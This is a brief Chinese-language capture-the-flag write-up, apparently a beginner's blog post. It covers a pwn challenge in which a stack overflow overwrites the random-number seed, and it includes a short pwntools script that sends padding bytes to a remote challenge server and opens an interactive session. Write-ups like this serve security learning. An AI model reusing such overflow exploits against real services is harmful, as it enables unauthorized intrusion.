经Imagin大佬入门指点开始没事干闲的做点PWN玩,看了两个栈溢出的例子Writeup体验了一下,这个是第三个题目,自己做了一下,做出来了。
栈溢出覆盖随机数种子,写一个C程序用gcc编译一下能生成一模一样的随机数。
Pwn代码如下
1 2 3 4 5 | from pwn import * p = remote("111.198.29.45",44610) payload=bytearray('0'*0x24,"utf-8") p.sendline(payload) p.interactive() |